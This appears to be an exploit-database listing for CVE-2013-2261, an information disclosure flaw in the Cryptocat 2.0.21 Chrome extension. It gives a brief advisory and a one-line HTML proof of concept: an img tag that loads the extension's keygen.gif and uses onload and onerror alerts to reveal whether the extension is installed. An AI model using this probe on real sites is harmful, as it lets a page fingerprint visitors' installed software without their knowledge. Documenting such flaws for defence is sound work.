Cryptocat 2.0.21 Chrome Extension - 'img/keygen.gif' File Information Disclosure



EKU-ID: 43018 CVE: CVE-2013-2261;OSVDB-95000 OSVDB-ID:
Author: Mario Heiderich Published: 2012-11-07 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/61090/info

Cryptocat is prone to an information disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information that may aid in further attacks.

Cryptocat 2.0.21 is vulnerable; other versions may also be affected.

<img src="chrome-extension://[extension-id-from-chrome-web-
store]/img/keygen.gif" onload=alert(/hascat/) onerror=alert(/hasnot/) >